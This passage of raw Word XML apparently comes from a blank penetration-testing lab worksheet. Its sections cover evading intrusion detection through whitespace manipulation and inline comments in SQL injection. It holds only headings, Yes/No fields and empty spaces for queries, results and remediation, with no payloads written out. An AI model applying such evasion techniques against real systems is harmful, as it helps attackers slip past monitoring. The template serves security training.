          <w:p w14:paraId="56194D9A" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08307248" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D91D8FE" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B55DBCC" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRPr="005D2C80" w:rsidRDefault="00B07F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="8"/>
    </w:tbl>
    <w:p w14:paraId="420427B7" w14:textId="7ABE2AA9" w:rsidR="001943CB" w:rsidRDefault="001943CB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D543E9" w:rsidRPr="00A51A96" w14:paraId="6A58E050" w14:textId="77777777" w:rsidTr="003056DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7749EEBE" w14:textId="0E76941C" w:rsidR="00D543E9" w:rsidRPr="003C713F" w:rsidRDefault="00D543E9" w:rsidP="00972D9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7.12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D543E9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evade IDS Detection by Manipulating White Spaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E58240D" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRPr="003056DB" w:rsidRDefault="00B07F1E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4143EA" w:rsidRPr="004143EA" w14:paraId="6EA40A76" w14:textId="77777777" w:rsidTr="003056D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3687572" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="003056D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143EA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96E7C52" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="004143E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143EA" w:rsidRPr="004143EA" w14:paraId="2E754CEA" w14:textId="77777777" w:rsidTr="003056D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632454F" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="003056D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143EA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199A5AA" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="004143E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143EA" w:rsidRPr="004143EA" w14:paraId="5CCDB4E0" w14:textId="77777777" w:rsidTr="003056D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514850C" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="003056D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143EA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F41079B" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="004143E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A2E07" w:rsidRPr="004143EA" w14:paraId="3B4D580C" w14:textId="77777777" w:rsidTr="003056D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0EA900E" w14:textId="0D7937C8" w:rsidR="00DA2E07" w:rsidRPr="004143EA" w:rsidRDefault="00DA2E07" w:rsidP="003056D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A2E07">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tested White Space Manipulation Techniques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23DAC93" w14:textId="77777777" w:rsidR="00DA2E07" w:rsidRDefault="00DA2E07" w:rsidP="004143E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DA2E0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[*Tabs, Carriage Returns, Line Feeds, No Spaces, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F6B280" w14:textId="77777777" w:rsidR="003056DB" w:rsidRDefault="003056DB" w:rsidP="004143E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D5C0D0A" w14:textId="77777777" w:rsidR="003056DB" w:rsidRDefault="003056DB" w:rsidP="004143E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1A53E22" w14:textId="13E62F79" w:rsidR="003056DB" w:rsidRPr="00DA2E07" w:rsidRDefault="003056DB" w:rsidP="004143E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F5C6C" w:rsidRPr="004143EA" w14:paraId="3D7DA2F6" w14:textId="77777777" w:rsidTr="003056D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B12099F" w14:textId="7859D85B" w:rsidR="00DF5C6C" w:rsidRPr="00DA2E07" w:rsidRDefault="00DF5C6C" w:rsidP="003056D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F5C6C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Payload Variants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328E322" w14:textId="77777777" w:rsidR="00DF5C6C" w:rsidRDefault="00DF5C6C" w:rsidP="004143E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DF5C6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Standard vs. Obfuscated Queries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305452A" w14:textId="77777777" w:rsidR="003056DB" w:rsidRDefault="003056DB" w:rsidP="004143E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24D202A" w14:textId="77777777" w:rsidR="003056DB" w:rsidRDefault="003056DB" w:rsidP="004143E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E07D4DA" w14:textId="361E11AC" w:rsidR="003056DB" w:rsidRPr="00DA2E07" w:rsidRDefault="003056DB" w:rsidP="004143E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4143EA" w:rsidRPr="004143EA" w14:paraId="54628CE5" w14:textId="77777777" w:rsidTr="003056D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AA0E0F9" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="003056D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143EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Queries used with Manipulated White Spaces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8E38400" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="143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B4BE224" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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92F7FBB" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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E43FE21" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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178FF9F" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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9F3431E" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="004143E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143EA" w:rsidRPr="004143EA" w14:paraId="3D93A07E" w14:textId="77777777" w:rsidTr="003056D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3C41377" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="003056D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143EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Evaded IDS Successfully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742BBA1B" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="142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4143EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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4C8FA401" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="142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4143EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF5C6C" w:rsidRPr="004143EA" w14:paraId="69E9B0CE" w14:textId="77777777" w:rsidTr="003056D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4556B41" w14:textId="07E29654" w:rsidR="00DF5C6C" w:rsidRPr="004143EA" w:rsidRDefault="00DF5C6C" w:rsidP="003056D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F5C6C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IDS Signature Evasion Success Rate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6551C653" w14:textId="77777777" w:rsidR="00DF5C6C" w:rsidRDefault="00DF5C6C" w:rsidP="00DF5C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DF5C6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[*% or Number of Successful Evasions vs. Total Attempts]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC97CCD" w14:textId="77777777" w:rsidR="003056DB" w:rsidRDefault="003056DB" w:rsidP="00DF5C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C9086A3" w14:textId="77777777" w:rsidR="003056DB" w:rsidRPr="00DF5C6C" w:rsidRDefault="003056DB" w:rsidP="00DF5C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CB464C3" w14:textId="77777777" w:rsidR="00DF5C6C" w:rsidRDefault="00DF5C6C" w:rsidP="00DF5C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7E43C49" w14:textId="12D32750" w:rsidR="00DF5C6C" w:rsidRPr="004143EA" w:rsidRDefault="00DF5C6C" w:rsidP="00DF5C6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143EA" w:rsidRPr="004143EA" w14:paraId="099721E0" w14:textId="77777777" w:rsidTr="000F4444">
        <w:trPr>
          <w:trHeight w:val="107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380CB5A" w14:textId="5D4401C4" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="00B82334" w:rsidP="000F444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82334">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Other Security Risks Identified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F0623C5" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="004143E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14301" w:rsidRPr="004143EA" w14:paraId="7FA1B8A0" w14:textId="77777777" w:rsidTr="000F4444">
        <w:trPr>
          <w:trHeight w:val="1502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C68D3C5" w14:textId="10ECD8D1" w:rsidR="00B82334" w:rsidRPr="004143EA" w:rsidRDefault="00B82334" w:rsidP="000F444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Remediation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C90F207" w14:textId="77777777" w:rsidR="00914301" w:rsidRPr="004143EA" w:rsidRDefault="00914301" w:rsidP="004143E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143EA" w:rsidRPr="004143EA" w14:paraId="50EB5CF0" w14:textId="77777777" w:rsidTr="000F4444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5FB31AC" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="000F444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143EA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0AD35CE" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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FF5DAA7" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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5D2290F" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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A7E0FF9" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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137901B" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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BA0550A" w14:textId="77777777" w:rsidR="004143EA" w:rsidRPr="004143EA" w:rsidRDefault="004143EA" w:rsidP="004143E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6FC5ED7A" w14:textId="77777777" w:rsidR="00914301" w:rsidRDefault="00914301" w:rsidP="00914301">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173456E3" w14:textId="77777777" w:rsidR="00914301" w:rsidRPr="00B07F1E" w:rsidRDefault="00914301" w:rsidP="00914301">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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4301" w:rsidRPr="005D2C80" w14:paraId="62F86524" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF5F5CA" w14:textId="77777777" w:rsidR="00914301" w:rsidRPr="005D2C80" w:rsidRDefault="00914301" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FE3307B" w14:textId="77777777" w:rsidR="00914301" w:rsidRPr="005D2C80" w:rsidRDefault="00914301" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79C7C050" w14:textId="77777777" w:rsidR="00914301" w:rsidRDefault="00914301" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F29B0F9" w14:textId="77777777" w:rsidR="00914301" w:rsidRDefault="00914301" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D7740A8" w14:textId="77777777" w:rsidR="00914301" w:rsidRPr="005D2C80" w:rsidRDefault="00914301" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49C2235D" w14:textId="77777777" w:rsidR="00914301" w:rsidRDefault="00914301" w:rsidP="000947B4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503B9D" w:rsidRPr="00A51A96" w14:paraId="52852659" w14:textId="77777777" w:rsidTr="00124D09">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="35853669" w14:textId="1D286430" w:rsidR="00503B9D" w:rsidRPr="003C713F" w:rsidRDefault="00503B9D" w:rsidP="00972D9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7.13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503B9D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evade IDS Detection using Inline Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4077B068" w14:textId="77777777" w:rsidR="00914301" w:rsidRPr="00B3003B" w:rsidRDefault="00914301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1449B9" w:rsidRPr="001449B9" w14:paraId="04140BE7" w14:textId="77777777" w:rsidTr="00B3003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254DB51" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="00B3003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449B9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C6E71E5" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="001449B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449B9" w:rsidRPr="001449B9" w14:paraId="5F043B88" w14:textId="77777777" w:rsidTr="00B3003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0195FBF" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="00B3003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449B9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87AEDDE" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="001449B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449B9" w:rsidRPr="001449B9" w14:paraId="46BBE3FE" w14:textId="77777777" w:rsidTr="00B3003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06CC119" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="00B3003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449B9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738BD1E" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="001449B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449B9" w:rsidRPr="001449B9" w14:paraId="4163F6A0" w14:textId="77777777" w:rsidTr="00B3003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12654AD" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="00B3003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449B9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Queries Used with In-line Comments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68B3CAD" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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6A38BCB" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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B36C783" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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F909B1F" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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99BC661" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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8167A70" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="001449B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449B9" w:rsidRPr="001449B9" w14:paraId="7048D03E" w14:textId="77777777" w:rsidTr="00B3003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2F92D18" w14:textId="157C5DCD" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="00F34346" w:rsidP="00B3003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34346">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Point Identified?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1C43CAD0" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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1449B9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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6FC83FE9" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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1449B9">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F34346" w:rsidRPr="001449B9" w14:paraId="04A5CF07" w14:textId="77777777" w:rsidTr="00B3003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80AF727" w14:textId="16471B8B" w:rsidR="00F34346" w:rsidRPr="00F34346" w:rsidRDefault="00F34346" w:rsidP="00B3003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34346">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IDS/IPS Detection Attempted?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77B85297" w14:textId="70C48519" w:rsidR="00F34346" w:rsidRPr="001449B9" w:rsidRDefault="00F34346" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes 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754574FC" w14:textId="45417215" w:rsidR="00F34346" w:rsidRPr="001449B9" w:rsidRDefault="00F34346" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F34346" w:rsidRPr="001449B9" w14:paraId="0AB257D4" w14:textId="77777777" w:rsidTr="00B3003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19510D9" w14:textId="579A4A09" w:rsidR="00F34346" w:rsidRPr="00F34346" w:rsidRDefault="00F34346" w:rsidP="00B3003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34346">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Inline Comment Obfuscation Applied?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4EB3F62D" w14:textId="1242841E" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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kern w:val="0"/>
                <w:szCs w:val="24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68F7EFAB" w14:textId="6D5CAC8F" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F34346" w:rsidRPr="001449B9" w14:paraId="12F42D3B" w14:textId="77777777" w:rsidTr="00B3003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473D3DE" w14:textId="39C46190" w:rsidR="00F34346" w:rsidRPr="00F34346" w:rsidRDefault="00F34346" w:rsidP="00B3003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34346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Successful IDS Evasion?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3A93B228" w14:textId="753F26E5" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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kern w:val="0"/>
                <w:szCs w:val="24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4F267F73" w14:textId="082360F5" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F34346" w:rsidRPr="001449B9" w14:paraId="7E9E8D8C" w14:textId="77777777" w:rsidTr="00B3003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7B9CC14" w14:textId="7D676642" w:rsidR="00F34346" w:rsidRPr="00F34346" w:rsidRDefault="00F34346" w:rsidP="00B3003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34346">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Alternative Comment-Based Evasion Techniques Used?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2CEFBC44" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="00F34346" w:rsidRDefault="00F34346" w:rsidP="00F3434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3434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[*Breaking SQL Keywords, Nested Comments, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64934BBD" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00F3434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7E81C9D" w14:textId="64F92586" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00F3434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449B9" w:rsidRPr="001449B9" w14:paraId="16191917" w14:textId="77777777" w:rsidTr="00B3003B">
        <w:trPr>
          <w:trHeight w:val="1196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469CB71" w14:textId="7EC0B76F" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="00B82334" w:rsidP="00B3003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F34346">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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9AE7DB3" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="001449B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34346" w:rsidRPr="001449B9" w14:paraId="34302122" w14:textId="77777777" w:rsidTr="00B3003B">
        <w:trPr>
          <w:trHeight w:val="1196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DAA1441" w14:textId="57FD6B6C" w:rsidR="00F34346" w:rsidRPr="001449B9" w:rsidRDefault="00B82334" w:rsidP="00B3003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Remediation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0D7DC6D" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="001449B9" w:rsidRDefault="00F34346" w:rsidP="001449B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449B9" w:rsidRPr="001449B9" w14:paraId="120D6E5A" w14:textId="77777777" w:rsidTr="00B3003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BE451C2" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="00B3003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449B9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121677A" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="147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98B91A7" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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A5FA7CE" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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2B57882" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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6DCD192" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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0608650" w14:textId="77777777" w:rsidR="001449B9" w:rsidRPr="001449B9" w:rsidRDefault="001449B9" w:rsidP="001449B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32E281AE" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00F34346">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695B3F2" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="00B07F1E" w:rsidRDefault="00F34346" w:rsidP="00F34346">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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4346" w:rsidRPr="005D2C80" w14:paraId="3475E5F4" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="5462"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28252C8C" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="005D2C80" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="352AC456" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="005D2C80" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44BAEA0A" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51B15075" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAA9EF6" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21209273" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
